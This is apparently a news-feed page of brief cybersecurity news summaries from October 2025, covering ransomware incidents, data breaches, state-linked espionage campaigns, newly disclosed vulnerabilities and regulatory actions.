The Tengu ransomware group has claimed responsibility for a cyberattack against UniCursos, a prominent education provider in Brazil. The attack, which was posted to the group's leak site on October 23, 2025, follows the common double-extortion model, where the attackers threaten to publish sensitive stolen data if their ransom demands are not met. The incident highlights the continued targeting of the education sector by ransomware gangs, who view them as valuable targets due to the sensitive student and staff data they hold.

Oct 24, 2025 · 4 min read

Ransomware Hits Jewett-Cameron, Steals Financial Data

Jewett-Cameron, an Oregon-based manufacturing and distribution company, has confirmed in an SEC filing that it suffered a ransomware attack on October 15, 2025. The attack caused significant disruption to its business operations and resulted in the theft of sensitive corporate data. The exfiltrated information reportedly includes IT and financial data being prepared for the company's upcoming Form 10-K filing, as well as screen captures from video meetings. The unidentified attackers have demanded a ransom and threatened to leak the stolen material.

Oct 24, 2025 · 4 min read

Lawsuit Hits SC School District After Ransomware Breach

South Carolina's Lexington-Richland School District 5 (LR5) is facing a class-action lawsuit following a ransomware attack in June 2025 that exposed the personally identifiable information (PII) of over 31,000 students, staff, and alumni. The lawsuit alleges that the school district was negligent in protecting sensitive data and violated state law by failing to provide timely and complete notification of the breach. The compromised data included names, birthdates, Social Security numbers, and financial files, making it one of the most significant breaches for an educational institution in the region.

Oct 24, 2025 · 4 min read

Lazarus Group's 'Operation DreamJob' Targets EU Drone-Makers

The notorious North Korea-linked APT group, Lazarus, is conducting a cyber-espionage campaign dubbed 'Operation DreamJob' targeting European defense and aerospace companies. The campaign specifically focuses on firms involved in Unmanned Aerial Vehicle (UAV) technology. The attackers use sophisticated social engineering, creating fake recruiter profiles and job offers to lure employees. The ultimate goal is to compromise the target's network to steal sensitive intellectual property related to advanced drone technology.

Oct 24, 2025 · 5 min read

Iran's MuddyWater APT Targets 100+ Governments with Phoenix Backdoor

The Iranian state-sponsored threat group MuddyWater is conducting a large-scale cyber-espionage campaign targeting over 100 government entities, primarily in the Middle East and North Africa (MENA). According to Group-IB, the attackers are using phishing emails sent from a compromised mailbox, leveraging the NordVPN service for anonymity. The emails contain malicious Word documents that use macros to deploy version 4 of the 'Phoenix' backdoor, a payload designed for foreign intelligence gathering. The campaign highlights the group's return to classic macro-based attack vectors.

Oct 23, 2025 · 6 min read

Unit 42 Exposes 'Smishing Deluge' from China and 'Jingle Thief' Gift Card Fraud

Researchers at Palo Alto Networks' Unit 42 have detailed two distinct and significant cybercrime operations. The first, a massive smishing campaign dubbed 'The Smishing Deluge,' is attributed to a China-based threat actor and is flooding mobile users globally with malicious SMS messages. The second campaign, named 'Jingle Thief,' is a sophisticated cloud-based operation focused on automating the theft and monetization of gift cards. These findings, highlighted in Unit 42's October Threat Bulletin, showcase the diverse tactics of modern criminals, from large-scale social engineering to highly targeted financial fraud.

Oct 23, 2025 · 5 min read

Critical RCE Flaw in WSUS Allows Unauthenticated SYSTEM Takeover

A critical remote code execution (RCE) vulnerability, CVE-2025-59287, with a CVSS score of 9.8, has been discovered in Microsoft's Windows Server Update Services (WSUS). The flaw allows an unauthenticated attacker on the same network to gain SYSTEM-level privileges on a vulnerable server by sending a maliciously crafted cookie. The vulnerability stems from an unsafe deserialization process. While not yet exploited in the wild, Microsoft rates exploitation as "more likely." Given that compromising WSUS could enable an attacker to distribute malicious updates across an entire enterprise, immediate patching is strongly advised.

Oct 23, 2025 · 4 min read

Massive Prosper Data Breach Exposes Social Security Numbers of 17.6 Million Users

The peer-to-peer lending platform Prosper has confirmed a catastrophic data breach compromising the sensitive personally identifiable information (PII) of approximately 17.6 million people. The exposed data includes full names, physical addresses, IP addresses, income levels, and, most critically, Social Security numbers. The breach, first detected in September 2025, places millions of individuals at severe risk of identity theft and sophisticated financial fraud.

Oct 23, 2025 · 7 min read

NY Regulator Puts Financial Firms on Notice: You Are Accountable for Your Vendors' Security

The New York State Department of Financial Services (DFS) has issued new guidance for financial institutions, emphasizing their ultimate accountability for managing cybersecurity risks originating from third-party service providers (TPSPs). The regulator warned that as firms increasingly rely on cloud computing, AI, and fintech solutions from vendors, their exposure to threats grows. The guidance explicitly states that boards of directors and senior officers must possess sufficient cybersecurity knowledge to oversee and challenge management's third-party risk strategies. DFS Acting Superintendent Kaitlin Asrow stressed that regulated entities cannot outsource their responsibility for protecting consumer data and ensuring operational security.

Oct 23, 2025 · 5 min read

Healthcare Breaches Seem to Drop, But Government Shutdown Hides True Numbers

Official data for September 2025 shows only 26 major healthcare data breaches, the lowest monthly total since 2018. However, The HIPAA Journal cautions that this apparent decline is misleading. A US government shutdown has largely halted the HHS's Office for Civil Rights (OCR) from processing and updating its public breach portal. The 26 reported breaches affected over 1.29 million individuals, with hacking incidents accounting for 98.8% of the exposed records. Experts believe the true number of breaches for September is significantly higher and will be reflected in a surge of reports once the OCR resumes normal operations.

Oct 23, 2025 · 5 min read

Palomar Health Breach Exposes Highly Sensitive Patient Data, Including Biometrics

Palomar Health Medical Group (PHMG), a California-based healthcare provider, has announced it was the victim of a cybersecurity incident that exposed sensitive patient data. The compromised information includes not only names and personal identifiers but also highly sensitive data types such as biometric data, U.S. alien registration numbers, and financial account information. The full scope of the breach, including the number of affected patients, has not yet been disclosed. The national class action law firm Lynch Carpenter is now investigating claims against PHMG, signaling significant legal and financial fallout for the provider.

Oct 23, 2025 · 5 min read

CrowdStrike: 76% of Organizations Can't Keep Pace with AI-Powered Ransomware

According to CrowdStrike's '2025 State of Ransomware Survey,' a staggering 76% of global organizations feel their defensive capabilities cannot match the speed and sophistication of AI-powered cyberattacks. Adversaries are now weaponizing artificial intelligence to accelerate every stage of the ransomware attack chain, from malware creation to social engineering, rendering legacy detection methods obsolete. Nearly half of organizations now view AI-automated attacks as their single greatest ransomware threat.

Oct 23, 2025 · 5 min read

UK's NCSC Warns of Doubling 'Nationally Significant' Cyberattacks, Cites Supply Chain Risk

The UK's National Cyber Security Centre (NCSC) has reported a sharp increase in cyberattacks, with 'nationally significant' cases more than doubling in the past year. In response, the NCSC is urging organizations to bolster their incident preparedness. Experts are pointing to vulnerabilities within the digital supply chain as a primary entry point for these attacks, with service providers like helpdesks becoming gateways to core business systems. A recent survey found that nearly a third of UK procurement managers reported a supply chain partner had been attacked in recent months.

Oct 22, 2025 · 4 min read

Critical Netty Zero-Day Bypasses All Major Email Authentication

A critical zero-day vulnerability, CVE-2025-59419, has been discovered in the widely used Netty Java library, affecting countless applications that handle email. The flaw allows an unauthenticated attacker to perform SMTP injection by embedding carriage return and line feed characters into email commands. This enables them to bypass standard email authentication defenses like SPF, DKIM, and DMARC, making it possible to send highly convincing spoofed emails that appear to originate from trusted domains. A patch is available and should be applied immediately.

Oct 22, 2025 · 6 min read

Patch Now: Critical RCE Flaws in Oracle E-Business Suite Marketing Module

Oracle has issued urgent patches for two critical, unauthenticated remote code execution (RCE) vulnerabilities in its E-Business Suite. The flaws, CVE-2025-53072 and CVE-2025-62481, both carry a CVSS score of 9.8 and affect the Oracle Marketing module. An attacker with network access can exploit these vulnerabilities via a simple HTTP request, without any user interaction, to achieve a full takeover of the marketing component. Oracle urges customers using affected versions (12.2.3 through 12.2.14) to apply the October 2025 Critical Patch Update immediately.

Oct 22, 2025 · 5 min read

DHS Breach: 'CitrixBleed 2.0' Zero-Day Exposes FEMA & CBP Employee Data

A critical zero-day vulnerability in Citrix NetScaler Gateway, dubbed 'CitrixBleed 2.0' (CVE-2025-5777), was exploited to breach the U.S. Department of Homeland Security. The attack, which began in June 2025, compromised the personal and employment data of staff at the Federal Emergency Management Agency (FEMA) and U.S. Customs and Border Protection (CBP). The threat actor gained initial access through FEMA's Region 6 network and moved laterally, leading to significant federal scrutiny and subsequent staff dismissals.

Oct 21, 2025 · 5 min read

Chinese APT Salt Typhoon Targets European Telecom with SNAPPYBEE Backdoor

The Chinese state-sponsored group Salt Typhoon has been observed targeting a European telecommunications firm by exploiting a known Citrix NetScaler vulnerability for initial access. Post-exploitation, the attackers deployed a backdoor known as SNAPPYBEE (or Deed RAT) using DLL side-loading techniques, hiding the malicious payload alongside legitimate antivirus executables to evade detection. The attack, which was part of a broader cyber-espionage campaign, was detected in its early stages by Darktrace before significant data exfiltration occurred.

Oct 21, 2025 · 5 min read

'GlassWorm' Worm Uses Unicode Obfuscation and Solana C2 in VS Code Supply Chain Attack

A highly sophisticated, self-propagating worm named 'GlassWorm' is targeting Visual Studio Code developers through malicious extensions on the OpenVSX marketplace. The malware employs advanced evasion techniques, including using invisible Unicode characters to obfuscate its code and leveraging the Solana blockchain for a resilient command-and-control (C2) infrastructure. The worm is designed to steal NPM, GitHub, and Git credentials, as well as drain cryptocurrency from 49 different wallet extensions.

Oct 21, 2025 · 5 min read

Russian APT COLDRIVER Rapidly Deploys New NOROBOT Malware After Public Disclosure

The Russian state-sponsored threat group COLDRIVER, also known as Star Blizzard and UNC4057, has demonstrated remarkable operational agility by deploying new malware families just five days after its LOSTKEYS malware was publicly disclosed in May 2025. According to Google's Threat Intelligence Group (GTIG), the group has ceased using LOSTKEYS and is now actively using a new toolset, including the NOROBOT DLL and a PowerShell backdoor called MAYBEROBOT, to target high-value individuals such as NGOs, policy advisors, and dissidents.

Oct 21, 2025 · 5 min read

UK Regulators Issue Cyber Recovery Guide for Financial Firms

The United Kingdom's top financial regulators—the Bank of England (BoE), the Financial Conduct Authority (FCA), and the Prudential Regulation Authority (PRA)—have jointly published a guide on effective cyber response and recovery practices. The guidance, aimed at all financial firms, emphasizes the critical need for the ability to recover from severe attacks by using immutable backups, maintaining segregated recovery environments, and conducting rigorous testing of both internal and third-party resilience.

Oct 21, 2025 · 4 min read

EU Launches Cybersecurity Reserve to Bolster Incident Response Across Member States

The European Union has officially established the European Cybersecurity Reserve as a key component of its Cyber Solidarity Act. Managed by the EU Agency for Cybersecurity (ENISA), the reserve has a €36 million budget and consists of 45 pre-vetted, trusted private providers, such as Airbus Protect and Spike Reply. This 'cyber reinforcement team' is designed to be deployed to assist EU member states and institutions during large-scale cyber incidents affecting critical infrastructure.

Oct 21, 2025 · 3 min read

'Cavalry Werewolf' APT Targets Russian Critical Infrastructure with Custom Malware

The Advanced Persistent Threat (APT) group known as Cavalry Werewolf (also tracked as YoroTrooper and Silent Lynx) conducted a targeted cyberattack campaign against Russia's public sector and critical industries between May and August 2025. The group leveraged spear-phishing emails to deliver custom malware, including FoalShell and StallionRAT. Post-compromise activities focused on reconnaissance and establishing persistence via Windows Registry modifications, while using SOCKS5 proxies for command-and-control and data exfiltration.

Oct 21, 2025 · 5 min read

CISA Mandates Patching for 5 New Actively Exploited Flaws in Apple, Microsoft, Oracle, and Kentico

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The flaws affect a range of widely used products, including Apple devices, Kentico Xperience, Microsoft Windows SMB Client, and Oracle E-Business Suite. Federal agencies are now mandated to apply patches by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to mitigate significant cyber risk.

Oct 20, 2025 · 8 min read

Anubis Ransomware Hits Australian Engineering Firm Aussie Fluid Power

The Australian industrial engineering company, Aussie Fluid Power, has confirmed it was hit by a ransomware attack claimed by the emerging 'Anubis' ransomware group. The incident, which has impacted company operations and stakeholder data, aligns with warnings from the Australian Cyber Security Centre (ACSC) about increasing cyber threats to critical infrastructure and the industrial sector. This attack underscores the growing risk posed by new ransomware gangs targeting operational technology (OT) environments.

Oct 20, 2025 · 7 min read

EU and Ukraine Deepen Cyber Defense Alliance in Face of Russian Aggression

The European Union and Ukraine have reaffirmed their strategic partnership on cybersecurity during their 4th Cyber Dialogue held in Kyiv. Against the backdrop of Russia's ongoing war, both parties committed to deepening cooperation on cyber defense, policy alignment with EU standards like the NIS2 Directive, and the protection of critical infrastructure. Ukraine will continue to share threat intelligence gained from defending against Russian cyberattacks to bolster the EU's collective security.

Oct 20, 2025 · 5 min read

Lending Platform Prosper Breached, 17.6 Million Accounts Exposed

The peer-to-peer lending platform Prosper has confirmed a massive data breach that exposed the personal and sensitive information of approximately 17.6 million user accounts. The breach notification service 'Have I Been Pwned' has already incorporated the data set, which includes names, email addresses, and phone numbers. The incident places millions of users at a significantly higher risk of targeted phishing campaigns, identity theft, and other fraudulent activities. Affected users are strongly advised to change their passwords and enable multi-factor authentication immediately.

Oct 20, 2025 · 4 min read

Clop Ransomware Claims Harvard University Breach, Threatens Data Leak

The prolific Russian-speaking ransomware group Clop has claimed responsibility for a cyberattack against Harvard University, adding the prestigious institution to its data leak site on October 12, 2025. The group, known for its 'big-game hunting' and exploitation of zero-day vulnerabilities, threatened to publish stolen data, stating that a torrent link would be available soon. The claim has not yet been confirmed by Harvard. Clop, also known as TA505, has a history of high-profile attacks using double-extortion tactics, including the mass exploitation of flaws in MOVEit Transfer and GoAnywhere MFT, which affected hundreds of organizations worldwide.

Oct 19, 2025 · 5 min read

F5 Breached by Nation-State Actor; BIG-IP Source Code Stolen, CISA Issues Emergency Directive

Application security vendor F5 has disclosed a major security breach attributed to a 'highly sophisticated nation-state threat actor.' The attackers maintained long-term access to F5's internal development environments, exfiltrating portions of the BIG-IP source code, information on undisclosed vulnerabilities, and some customer configuration data. While F5 states there is no evidence of software supply chain modification, the incident poses a significant future risk. In response, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, mandating all federal civilian agencies to immediately patch F5 products, inventory devices, and remove end-of-life systems from their networks.

Oct 19, 2025 · 5 min read

Massive Airline Data Breach Hits 13 Million Vietnam Airlines and Qantas Customers

A major data breach originating from a third-party service provider has compromised the personal information of approximately 13 million customers of Vietnam Airlines and Qantas. A group calling itself 'Scattered LAPSUS$ Hunters' claims to have stolen the data in June by breaching the Salesforce accounts of a technology partner used by the airlines. The leaked data includes full names, dates of birth, email addresses, phone numbers, and loyalty program details. Both airlines have confirmed the breach and are urging customers to change their passwords.

Oct 19, 2025 · 5 min read

"SIMCARTEL" CaaS Network Busted in Major European Takedown

A coordinated international law enforcement operation codenamed "SIMCARTEL" has dismantled a massive Cybercrime-as-a-Service (CaaS) platform operating out of Latvia. The operation, involving authorities from Austria, Estonia, and Finland with support from Europol, resulted in seven arrests and the seizure of a vast infrastructure that enabled millions of euros in financial fraud. The network provided criminals with access to over 40,000 active SIM cards via SIM box devices, which were used to create approximately 49 million fraudulent online accounts, facilitating crimes like phishing, smishing, and investment fraud across Europe.

Oct 19, 2025 · 5 min read

Silver Fox APT Expands Reach, Targets Japan and Malaysia with New RAT

The Chinese-nexus cybercrime group known as "Silver Fox" has expanded its targeting beyond China and Taiwan to include organizations in Japan and Malaysia. Researchers report the group is using phishing emails with malicious PDFs to distribute the HoldingHands RAT. This expansion follows previous campaigns where the group used diverse tactics, including SEO poisoning to spread the Winos 4.0 (ValleyRAT) malware and Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software. The group's evolving tactics and widening geographic scope indicate an increased threat to government and commercial entities across Asia.

Oct 19, 2025 · 5 min read

Panera Bread Reaches $2.5M Settlement for 2024 Data Breach

Panera Bread has agreed to a $2.5 million settlement to resolve a class-action lawsuit related to a data breach that occurred in March 2024. The breach exposed the personal information, including names and Social Security numbers, of approximately 147,321 individuals, primarily current and former employees. Under the settlement, affected individuals can file claims for reimbursement of expenses and time spent dealing with the breach's aftermath, with a claim deadline of November 11, 2025.

Oct 19, 2025 · 4 min read

Volkswagen Probes 8Base Ransomware Attack Claim

The Volkswagen Group is investigating a claim from the 8Base ransomware group that it has breached the automotive giant and stolen sensitive data. 8Base, a data extortion group linked to Phobos ransomware, posted a trove of allegedly stolen files on its dark web site, including accounting documents and employee contracts. Volkswagen stated its core IT systems are secure but acknowledged the possibility of a breach through a third-party supplier, highlighting the growing threat of supply chain attacks. The incident places Volkswagen under potential GDPR scrutiny.

Oct 19, 2025 · 5 min read

'Mysterious Elephant' APT Evolves, Deploys Custom Tools in Espionage Campaign

The cyber-espionage group known as 'Mysterious Elephant' has demonstrated a significant evolution in its capabilities, moving away from recycled malware to deploying its own custom-developed tools. Since early 2025, the APT group has been targeting government and diplomatic entities in South Asia. This strategic shift indicates an increased level of sophistication and investment, allowing the group to create more effective and evasive malware for its intelligence-gathering operations. The campaign poses a notable threat to the targeted governments and may have indirect implications for European nations with interests in the region.

Oct 18, 2025 · 5 min read

Microsoft Patches 172 Flaws, Including Three Actively Exploited Zero-Days

Microsoft's October 2025 Patch Tuesday update is one of the largest of the year, addressing over 172 vulnerabilities across its product suite. The release is critically important as it includes patches for three zero-day vulnerabilities under active attack. These include an elevation of privilege flaw in the Windows Remote Access Connection Manager (CVE-2025-59230), which has been added to CISA's KEV catalog. Additionally, a highly critical, pre-authentication remote code execution vulnerability (CVE-2025-59287) in the Windows Server Update Service (WSUS) with a 9.8 CVSS score requires immediate attention. The update also marks the final security patch for most versions of Windows 10, pushing organizations towards migration.

Oct 18, 2025 · 5 min read

Cisco Zero-Day Flaw Actively Exploited to Implant Linux Rootkits on Network Switches

A critical zero-day vulnerability in Cisco IOS and IOS XE software, tracked as CVE-2025-20352, has been actively exploited in the wild to install Linux rootkits on network devices. The campaign, dubbed 'ZeroDisco' by Trend Micro, targeted Cisco 9400, 9300, and 3750G series switches. The attackers leveraged the SNMP stack overflow flaw for remote code execution after obtaining high-privilege credentials, implanting a fileless rootkit that could evade detection by disappearing after a reboot. Cisco has released patches and urges customers to update affected devices immediately.

Oct 18, 2025 · 5 min read

Deloitte to Pay $6.3M in Settlement for Rhode Island Data Breach Affecting 640,000

Deloitte has agreed to a proposed $6.3 million class-action settlement related to a 2024 cyberattack that compromised the personal data of 640,000 Rhode Island residents—nearly half the state's population. The breach affected the state's 'RIBridges' social services system, which was managed by Deloitte. The incident resulted in significant disruption to state government services and the eventual leak of some compromised data on the dark web. This settlement is in addition to a previous $5 million payment Deloitte made to the state to cover breach-related expenses.

Oct 18, 2025 · 4 min read

New 'CAPI Backdoor' Malware Targets Russian Auto and E-Commerce Firms

A new cyberespionage campaign is targeting the Russian automobile and e-commerce sectors using a previously undocumented .NET malware known as 'CAPI Backdoor'. According to researchers at Seqrite Labs, the attack is initiated through phishing emails containing a ZIP archive with a malicious LNK file. The malware uses a living-off-the-land technique, executing via 'rundll32.exe', and establishes persistence through scheduled tasks and startup folder entries. CAPI Backdoor is designed to gather system information, check for antivirus products, and exfiltrate data to a C2 server.

Oct 18, 2025 · 4 min read

Everest Ransomware Claims Collins Aerospace Hack; Leak Site Mysteriously Goes Offline

The Everest ransomware group has claimed responsibility for the September 2025 cyberattack on Collins Aerospace, a major aviation and defense contractor. The attack caused widespread disruption, affecting check-in and boarding systems at major European airports like Heathrow and Brussels. Shortly after posting the claim on its dark web data leak site, the site became inaccessible, displaying a "Fatal error" message. This has fueled speculation about a potential law enforcement takedown or internal disruption within the ransomware group.

Oct 18, 2025 · 4 min read

Massive Supply Chain Risk Found in VSCode Marketplace; 100+ Extensions Leaked Access Tokens

Researchers at Wiz have discovered a significant supply chain risk in the popular VSCode and OpenVSX extension marketplaces. They found that publishers of over 100 extensions had inadvertently leaked their access tokens, which could have allowed attackers to hijack the extensions and distribute malware to more than 150,000 users. The research also uncovered over 550 exposed secrets within 500+ extensions, providing access to developer accounts on services like AWS, GitHub, and OpenAI, further highlighting the pervasive security risks in the software development ecosystem.

Oct 18, 2025 · 4 min read

UK's NCSC Warns of 'Alarming' Rise in Cyberattacks, Doubling in Past Year

The UK's National Cyber Security Centre (NCSC) revealed in its 2025 annual review that it managed 204 "nationally significant" cyberattacks over the past year, more than double the 89 incidents from the previous year. The agency attributed the alarming surge to increasing threats from state-sponsored actors, particularly Russia and China, as well as the proliferation of sophisticated ransomware gangs. The NCSC has urged UK businesses to treat cybersecurity as a matter of survival and to elevate cyber resilience to a board-level responsibility to combat the growing threat.

Oct 18, 2025 · 4 min read

Ransomware Attacks Surge 36% in Q3 2025, Data Stolen in 96% of Cases

A new report from cybersecurity firm BlackFog reveals that publicly disclosed ransomware attacks surged by 36% year-over-year in the third quarter of 2025, setting a new record. The analysis highlights the near-universal adoption of double-extortion tactics, with data exfiltration occurring in 96% of all incidents. The Qilin ransomware group was identified as the most active publicly attributed gang. Healthcare remained the most targeted public sector, while manufacturing was the hardest-hit sector in non-disclosed attacks, underscoring the pervasive and growing threat of ransomware across all industries.

Oct 18, 2025 · 4 min read

CISA Warns: Critical Adobe AEM Flaw (CVSS 10.0) Actively Exploited

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning for a critical remote code execution (RCE) vulnerability in Adobe Experience Manager (AEM) Forms, tracked as CVE-2025-54253. The flaw, which carries a perfect 10.0 CVSS score, allows for unauthenticated arbitrary code execution and is being actively exploited in the wild. CISA has added it to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by November 5, 2025. The vulnerability stems from a misconfiguration in JEE versions of AEM that exposes a debug servlet, allowing attackers to achieve full system compromise.

Oct 17, 2025 · 4 min read

UK Fines Capita £14M for "Preventable" 2023 Data Breach

The UK's Information Commissioner's Office (ICO) has levied a £14 million fine against outsourcing giant Capita for significant data protection failures related to a March 2023 data breach that impacted 6.6 million people. The ICO's investigation concluded the breach was 'preventable' and heavily criticized Capita's slow incident response, noting that a compromised device remained active on the network for 58 hours after detection, allowing for further exploitation. The penalty highlights the increasing regulatory focus on the speed and efficacy of breach containment.

Oct 17, 2025 · 4 min read

CISA Issues 13 Advisories for Critical ICS/OT Vulnerabilities

On October 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a significant batch of thirteen advisories for vulnerabilities affecting Industrial Control Systems (ICS). These alerts impact widely used Operational Technology (OT) products from major vendors including Rockwell Automation, Siemens, Hitachi Energy, Schneider Electric, and Delta Electronics. The flaws pose a direct risk to critical infrastructure sectors such as manufacturing and energy. CISA is urging all asset owners and operators to review the advisories and implement the recommended mitigations immediately.

Oct 17, 2025 · 4 min read

California Enacts Stricter Data Breach Law with 30-Day Notification Deadline

California has enacted Senate Bill 446, a new law that significantly shortens the data breach notification timeline for businesses. Organizations must now inform affected California residents of a data breach involving unencrypted personal information within 30 calendar days of its discovery. This amendment to the state's already stringent privacy laws places increased pressure on companies to have highly efficient incident detection and response processes in place to meet the accelerated deadline.

Oct 17, 2025 · 4 min read

Ransomware Attacks Surge by 46% as Threat Actors Target Construction and Manufacturing

Despite a slight decrease in overall weekly cyber attacks, ransomware activity has surged by 46%, according to a new report from Check Point Research. This indicates a strategic shift by threat actors towards more focused and impactful ransomware campaigns. The construction, business services, and industrial manufacturing sectors have been the most victimized, bearing the brunt of this new wave. The report identifies the Qilin ransomware-as-a-service (RaaS) group as one of the most prominent actors, responsible for 14.1% of publicly disclosed victims. The findings highlight an urgent need for organizations, especially in the industrial and business services sectors, to bolster their defenses against an increasingly targeted ransomware threat.

Oct 17, 2025 · 4 min read

Akira Ransomware Gang Actively Exploiting SonicWall VPNs for Network Breaches

The Akira ransomware group is actively exploiting vulnerabilities in SonicWall SSL VPN devices to gain initial access to corporate networks. By targeting these widely used, internet-facing appliances, the threat actors can establish a foothold, move laterally, exfiltrate sensitive data, and ultimately deploy the Akira ransomware payload. This campaign underscores the critical importance of promptly patching edge devices and enforcing multi-factor authentication for all remote access solutions to defend against sophisticated ransomware attacks.

Oct 16, 2025 · 6 min read

CISA Orders Urgent Patching After Chinese Hackers Steal F5 Source Code

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, ordering federal agencies to take immediate action after F5 disclosed a severe breach by a sophisticated nation-state actor, reportedly linked to China. The attackers maintained access for at least a year, exfiltrating proprietary source code for F5 BIG-IP products and details of unpatched vulnerabilities. This breach poses an imminent supply chain risk, as the stolen data could allow adversaries to craft powerful zero-day exploits against F5 customers worldwide, including government and critical infrastructure.

Oct 16, 2025 · 6 min read

Microsoft Thwarts Ransomware Campaign by Revoking 200+ Malicious Code-Signing Certificates

Microsoft has taken decisive action to disrupt a ransomware campaign by the threat group Vanilla Tempest (also known as Vice Society), which has been targeting education and healthcare. The group was using over 200 fraudulently obtained code-signing certificates to sign counterfeit Microsoft Teams installers. These fake installers delivered the Oyster backdoor, which in turn deployed the Rhysida ransomware. By revoking the certificates from providers like DigiCert, SSL.com, and its own Trusted Signing service, Microsoft has significantly hindered the malware's ability to evade detection.

Oct 16, 2025 · 5 min read

Full Industrial Control: Two CVSS 10.0 Flaws Found in Red Lion ICS RTUs

Security researchers have discovered and disclosed two critical vulnerabilities, both rated CVSS 10.0, in Red Lion Sixnet series industrial remote terminal units (RTUs). The flaws, CVE-2023-42770 (authentication bypass) and CVE-2023-40151 (remote code execution), can be chained together. An unauthenticated attacker can exploit them over the network to execute arbitrary commands with root privileges on affected devices, which are commonly used in critical infrastructure sectors like energy and water treatment, posing a risk of severe physical disruption.

Oct 16, 2025 · 5 min read

New 'LinkPro' Linux Rootkit Uses eBPF and 'Magic Packets' for Ultimate Stealth

Security researchers have uncovered a sophisticated new GNU/Linux rootkit named 'LinkPro' after investigating a compromised AWS environment. The malware demonstrates advanced stealth capabilities by leveraging extended Berkeley Packet Filter (eBPF) modules to hide its processes and files from security tools. Furthermore, it employs a novel activation mechanism, lying dormant until it receives a specially crafted 'magic packet' over the network. The initial intrusion vector was a vulnerable Jenkins server, from which the attackers deployed the rootkit via a malicious Docker image.

Oct 16, 2025 · 6 min read

Qilin Ransomware Group Adds New Victims to Leak Site

The Qilin ransomware-as-a-service (RaaS) operation continues its campaign of double extortion, recently adding new victims to its data leak site. Among the latest targets are U.S.-based electrical equipment manufacturer Beta Dyne and Middlesex Appraisal Associates. According to research from Resecurity, the group's operational resilience is bolstered by its use of a global network of bulletproof hosting providers, making its infrastructure difficult to disrupt. The group's continued activity poses a persistent threat to organizations across various sectors, leveraging data encryption and the threat of public data release to pressure victims into paying ransoms.

Oct 16, 2025 · 4 min read

Vietnam Airlines Breach: 7.3M Customer Records Exposed in Salesforce Supply Chain Attack

Vietnam Airlines has suffered a massive data breach exposing the records of 7.3 million unique customers. The attack, revealed on October 11, 2025, is attributed to the 'Scattered LAPSUS$ Hunters' hacking group, the same collective behind the recent Qantas breach. The compromise occurred in June 2025 when attackers gained access to the airline's Salesforce-based CRM platform. The stolen data, which includes 7.3 million unique email addresses and other personal details, was released in October. The incident highlights the growing threat of supply chain attacks targeting major software vendors like Salesforce to compromise their extensive client bases. The airline's delayed response has drawn criticism for a lack of transparency.

Oct 15, 2025 · 5 min read

Canadian Tire Reveals E-Commerce Data Breach Affecting Multiple Retail Brands

Canadian Tire Corp., a major Canadian retail conglomerate, has reported a data breach affecting its e-commerce customers. Discovered on October 2, 2025, the incident involved unauthorized access to a single database serving multiple brands, including Canadian Tire, SportChek, Mark's/L'Équipeur, and Party City. The exposed data includes customer names, addresses, email addresses, and years of birth. The company stated that financial data and its Triangle Rewards loyalty program were not impacted. For a subset of fewer than 150,000 customers whose full birth dates were exposed, Canadian Tire is offering complimentary credit monitoring services.

Oct 15, 2025 · 4 min read

LockBit Ransomware Returns from Hiatus with Upgraded 'Version 5.0'

After a two-month hiatus following law enforcement disruption, the prolific LockBit ransomware group has returned, announcing the release of LockBit 5.0. This new version of the ransomware-as-a-service (RaaS) malware incorporates significant technical upgrades designed to evade detection and analysis. According to researchers, a key new feature is the ability to patch Event Tracing for Windows (ETW), a technique that blinds security monitoring tools by altering in-memory logging. The upgraded malware is designed for cross-platform attacks, targeting Windows, Linux, and VMware ESXi environments, signaling LockBit's intent to reclaim its dominant position in the cybercrime ecosystem.

Oct 15, 2025 · 5 min read

Israeli Defense R&D Firm 'MAYA' Targeted in Pro-Resistance Hacktivist Attack

A hacktivist group calling itself the 'Cyber Support Front' has claimed responsibility for a cyberattack against MAYA, an Israeli research and development firm with close ties to the country's Ministry of Defense and major defense contractors like Elbit Systems and Rafael. In a public statement on October 14, the group alleged it had disrupted MAYA's systems and exfiltrated sensitive data, including designs for current and future military equipment. The claims have not been officially confirmed by Israeli authorities, but the incident highlights the ongoing threat of politically motivated cyberattacks against the defense industrial base.

Oct 15, 2025 · 4 min read

Fortinet Discloses High-Severity Authenticated RCE Flaw in FortiOS CLI

Fortinet has disclosed a high-severity vulnerability in the command line interface (CLI) of its FortiOS operating system. The flaw could allow an authenticated attacker to execute arbitrary commands on the underlying system. While a CVE identifier has not yet been assigned and specific affected versions are not detailed, the vulnerability poses a significant risk. An attacker with valid CLI credentials could leverage this flaw to gain full control of a Fortinet appliance, bypass security controls, and use the device as a pivot point for further network intrusion. Administrators are urged to monitor for an official security advisory and apply patches as soon as they are available.

Oct 15, 2025 · 4 min read

Chinese APT 'Jewelbug' Breaches Russian IT Firm in Supply Chain Threat

In a rare instance of Chinese cyber-espionage targeting a Russian entity, the APT group known as Jewelbug compromised a Russian IT service provider for five months in early 2025. According to Symantec, the attackers gained access to the firm's code repositories and software build systems, creating a significant risk of a software supply chain attack. The group used the powerful ShadowPad backdoor and exfiltrated data to Yandex Cloud to evade detection. This campaign highlights the expanding target scope of Chinese APTs and their focus on compromising trusted providers to enable downstream attacks.

Oct 14, 2025 · 5 min read

Fashion Retailer MANGO Discloses Data Breach from Third-Party Vendor

Global fashion retailer MANGO has notified customers of a data breach that originated from a compromise at an external marketing service provider. The incident, disclosed on October 14, 2025, resulted in the unauthorized access of customer contact information, including names, country, postal codes, email addresses, and phone numbers. MANGO has confirmed that its internal systems were not affected and that no sensitive financial data or account credentials were exposed. The company has reported the breach to the Spanish Data Protection Agency (AEPD) and is advising customers to be wary of potential phishing attacks.

Oct 14, 2025 · 4 min read

Adobe Patches 35+ Flaws, Including Critical RCE Bug in Connect

